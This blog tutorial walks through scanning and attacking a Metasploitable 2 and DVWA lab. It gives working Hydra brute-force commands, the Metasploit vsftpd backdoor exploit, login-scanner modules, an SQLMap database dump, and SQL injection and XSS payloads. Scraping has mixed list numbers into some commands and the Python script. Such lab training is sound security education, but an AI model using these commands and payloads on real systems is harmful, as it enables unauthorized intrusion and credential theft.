Exploiting Systems with Metasploit Framework: A Comprehensive Guide

byEngr. M.A. Rashid Rony
0

Exploiting Systems with Metasploit Framework: A Comprehensive Guide

Introduction

The Metasploit Framework is a powerful penetration testing tool used by security professionals to identify and exploit vulnerabilities in systems and networks. When specific ports (e.g., 21, 22, 25, 80, 8080, 443, 110, 465, 3306, 2091) are open, they may indicate services like FTP, SSH, SMTP, HTTP, HTTPS, POP3, SMTPS, MySQL, or others that could be vulnerable to exploitation. This article provides a professional, step-by-step guide to ethically exploiting systems using Metasploit, THC-Hydra, Burp Suite, and other methods in a controlled lab environment (e.g., Metasploitable 2 or Damn Vulnerable Web Application (DVWA)). The focus is on authorized security testing, emphasizing ethical and legal practices.

Ethical Note: Exploiting systems without explicit permission is illegal and unethical. This guide is for educational purposes and should only be applied in controlled environments or with authorization.

Prerequisites

Before proceeding, ensure the following:

  • A Kali Linux system with root access.
  • A target system (e.g., Metasploitable 2 or DVWA) in a controlled lab environment.
  • Wordlists for brute forcing (e.g., /usr/share/wordlists/rockyou.txt).
  • Basic knowledge of networking, Linux command-line, and penetration testing.
  • An internet connection for installing tools.
  • Authorization to test the target system.

Step 1: Setting Up the Environment

Kali Linux Setup

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  1. Install Required Tools:
    • Metasploit Framework:

sudo apt install metasploit-framework -y

    • THC-Hydra:

sudo apt install hydra -y

    • Burp Suite: Pre-installed in Kali; launch via:

burpsuite

    • Nmap: Pre-installed in Kali for port scanning.
  1. Prepare Wordlists:
    • Extract the rockyou.txt wordlist:

gunzip /usr/share/wordlists/rockyou.txt.gz

    • Create a username list (e.g., users.txt):

echo -e "admin\nroot\nmsfadmin\ntestuser" > users.txt

Target System Setup

  1. Metasploitable 2:
    • Download from Rapid7 and set up in a virtual machine (e.g., VirtualBox).
    • Configure network to NAT or Host-Only.
    • Note the IP address (e.g., 192.168.1.100) using:

ifconfig

  1. DVWA (for web-based attacks):
    • Install a LAMP stack:

sudo apt install apache2 mysql-server php libapache2-mod-php -y

    • Download DVWA from GitHub and extract to /var/www/html.
    • Configure the database and access DVWA at http://<target-ip>/dvwa.

Step 2: Scanning and Enumeration

Use Nmap to confirm open ports and identify services.

Nmap Scan

  1. Run a Detailed Scan:

nmap -sS -sV -p 21,22,25,80,8080,443,110,465,3306,2091 -O 192.168.1.100

    • -sS: Stealth SYN scan.
    • -sV: Service version detection.
    • -p: Specific ports.
    • -O: OS detection.
  1. Example Output (Metasploitable 2):

3.  21/tcp   open  ftp     vsftpd 2.3.4

4.  22/tcp   open  ssh     OpenSSH 4.7p1

5.  25/tcp   open  smtp    Postfix smtpd

6.  80/tcp   open  http    Apache httpd 2.2.8

7.  8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

8.  443/tcp  open  https   Apache httpd 2.2.8

9.  110/tcp  open  pop3    Dovecot pop3d

10.465/tcp  open  smtps   Postfix smtpd

11.3306/tcp open  mysql   MySQL 5.0.51a

2091/tcp open  unknown

Step 3: Brute Force Attacks with THC-Hydra

Hydra is effective for brute forcing credentials on services like FTP (21), SSH (22), SMTP (25), POP3 (110), SMTPS (465), and MySQL (3306).

FTP Brute Force (Port 21)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ftp://192.168.1.100

    • Output example:

[21][ftp] host: 192.168.1.100 login: msfadmin password: msfadmin

  1. Save Results:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -o ftp_results.txt ftp://192.168.1.100

SSH Brute Force (Port 22)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.100

HTTP POST Form Brute Force (Ports 80, 8080, 443)

  1. Identify Login Form (e.g., DVWA):
    • Use Burp Suite to capture the POST request (see Step 4).
    • Example: username=admin&password=^PASS^&Login=Login.
  2. Run Hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 http-post-form "/dvwa/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:Username and/or password incorrect."

MySQL Brute Force (Port 3306)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 mysql://192.168.1.100

Step 4: Web Exploitation with Burp Suite

Burp Suite is ideal for exploiting web vulnerabilities on ports 80, 8080, and 443.

Setup

  1. Configure Proxy:
    • In Burp Suite, go to Proxy > Options and ensure the proxy is on (127.0.0.1:8080).
    • Set your browser to use the proxy.
  2. Enable Intercept: Go to Proxy > Intercept and turn on interception.

Brute Force Login

  1. Capture Request:
    • Navigate to http://192.168.1.100/dvwa/vulnerabilities/brute/.
    • Submit a test login (e.g., admin:test).
    • Intercept the POST request in Burp Suite.
  2. Send to Intruder:
    • Right-click the request, select Send to Intruder.
    • In Intruder > Positions, set attack type to Sniper or Cluster Bomb.
    • Highlight the password field and click Add §.
  3. Configure Payloads:
    • In Intruder > Payloads, load /usr/share/wordlists/rockyou.txt.
    • Add users.txt for usernames if needed.
  4. Start Attack:
    • Click Start Attack. Look for HTTP 302 responses or unique response lengths indicating success.

Exploit Vulnerabilities

  1. SQL Injection (Port 80/8080):
    • In DVWA, test for SQL injection in vulnerable fields.
    • Capture requests and use Burp Suite’s Repeater to test payloads (e.g., 1' OR '1'='1).
  2. XSS:
    • Test for XSS vulnerabilities:

<script>alert('XSS')</script>

    • Use Burp Suite to intercept and modify requests.

Step 5: Exploiting with Metasploit

Metasploit offers modules for exploiting services on the identified ports.

Setup

  1. Start Metasploit:

msfconsole

FTP Exploitation (Port 21)

  1. Check for Vulnerabilities:

2.  use auxiliary/scanner/ftp/ftp_version

3.  set RHOSTS 192.168.1.100

run

    • Confirm vsftpd 2.3.4 (vulnerable to backdoor in older versions).
  1. Exploit vsftpd Backdoor:

5.  use exploit/unix/ftp/vsftpd_234_backdoor

6.  set RHOSTS 192.168.1.100

7.  set RPORT 21

run

    • If successful, a shell is opened.

SSH Exploitation (Port 22)

  1. Brute Force Credentials:

2.  use auxiliary/scanner/ssh/ssh_login

3.  set RHOSTS 192.168.1.100

4.  set USER_FILE users.txt

5.  set PASS_FILE /usr/share/wordlists/rockyou.txt

6.  set THREADS 4

7.  set STOP_ON_SUCCESS true

run

  1. Exploit Known Credentials:
    • If credentials are found (e.g., msfadmin:msfadmin), use:

o    use exploit/multi/ssh/sshexec

o    set RHOSTS 192.168.1.100

o    set USERNAME msfadmin

o    set PASSWORD msfadmin

run

SMTP Enumeration (Port 25/465)

  1. Enumerate Users:

2.  use auxiliary/scanner/smtp/smtp_enum

3.  set RHOSTS 192.168.1.100

4.  set RPORT 25

run

  1. Brute Force SMTP:

6.  use auxiliary/scanner/smtp/smtp_login

7.  set RHOSTS 192.168.1.100

8.  set USER_FILE users.txt

9.  set PASS_FILE /usr/share/wordlists/rockyou.txt

run

HTTP Exploitation (Ports 80, 8080, 443)

  1. Scan for Vulnerabilities:

2.  use auxiliary/scanner/http/dir_scanner

3.  set RHOSTS 192.168.1.100

4.  set RPORT 80

run

  1. Exploit DVWA:
    • For command injection (if present):

o    use exploit/unix/webapp/dvwa_command_injection

o    set RHOSTS 192.168.1.100

o    set RPORT 80

o    set TARGETURI /dvwa

run

MySQL Exploitation (Port 3306)

  1. Brute Force Credentials:

2.  use auxiliary/scanner/mysql/mysql_login

3.  set RHOSTS 192.168.1.100

4.  set USER_FILE users.txt

5.  set PASS_FILE /usr/share/wordlists/rockyou.txt

run

  1. Exploit Weak Credentials:
    • If credentials are found (e.g., root:password):

o    use auxiliary/admin/mysql/mysql_sql

o    set RHOSTS 192.168.1.100

o    set USERNAME root

o    set PASSWORD password

o    set SQL show databases

run

POP3 Brute Force (Port 110)

  1. Brute Force Credentials:

2.  use auxiliary/scanner/pop3/pop3_login

3.  set RHOSTS 192.168.1.100

4.  set USER_FILE users.txt

5.  set PASS_FILE /usr/share/wordlists/rockyou.txt

run

Unknown Service (Port 2091)

  1. Identify Service:
    • Use Nmap or Metasploit’s auxiliary/scanner/portscan/tcp to gather more details.
    • Check for known vulnerabilities using:

search port:2091

  1. Custom Exploitation:
    • If a specific service is identified, search for exploits in Metasploit or online databases like Exploit-DB.

Step 6: Other Exploitation Methods

SQLMap (Port 3306, 80, 8080, 443)

SQLMap automates SQL injection attacks.

  1. Install SQLMap:

sudo apt install sqlmap -y

  1. Test for SQL Injection:

sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=your_session_id" --dbs

    • Enumerate databases, tables, and dump data if vulnerabilities are found.

Custom Scripts

For services on port 2091 or complex web apps:

  1. Python Script for HTTP Testing:

2.  import requests

3.   

4.  url = "http://192.168.1.100:2091"

5.  for payload in open("payloads.txt", "r").readlines():

6.      response = requests.get(url, params={"input": payload.strip()})

7.      if "error" not in response.text.lower():

        print(f"Possible vulnerability: {payload.strip()}")

    • Save as test.py and run:

python3 test.py

Step 7: Testing and Validation

  1. Test Environment:
    • Use Metasploitable 2 or DVWA with known vulnerabilities.
    • Verify exploits (e.g., shells, database access) work as expected.
  2. Check Firewall Rules:

sudo ufw allow 21,22,25,80,8080,443,110,465,3306,2091/tcp

  1. Validate Results:
    • Confirm credentials or exploits grant access (e.g., SSH login, web shell).
    • Check Metasploit sessions (sessions -i).

Step 8: Best Practices for Ethical Exploitation

  • Obtain Permission: Always have explicit authorization.
  • Limit Scope: Target only authorized systems and ports.
  • Secure Data: Delete captured credentials and logs after testing.
  • Use Safe Environments: Test in isolated labs to avoid unintended damage.
  • Combine Tools: Use Nmap for enumeration, Hydra for brute forcing, Burp Suite for web attacks, and Metasploit for exploitation.
  • Patch Vulnerabilities: Post-testing, recommend fixes (e.g., strong passwords, updated software).
  • Document Findings: Provide a detailed report with vulnerabilities and mitigation strategies.

Conclusion

The Metasploit Framework, combined with tools like THC-Hydra, Burp Suite, and SQLMap, provides a robust toolkit for ethically exploiting vulnerabilities on open ports (21, 22, 25, 80, 8080, 443, 110, 465, 3306, 2091). By following this guide in a controlled environment, security professionals can identify and address weaknesses in services like FTP, SSH, HTTP, and MySQL. Always prioritize ethical use, obtain permission, and implement best practices to ensure responsible and legal testing.

References:

  • Metasploit: https://docs.rapid7.com/metasploit/
  • THC-Hydra: https://www.kali.org/tools/hydra/
  • Burp Suite: https://portswigger.net/burp
  • SQLMap: https://sqlmap.org

 

Tags:

Post a Comment

Previous Post Next Post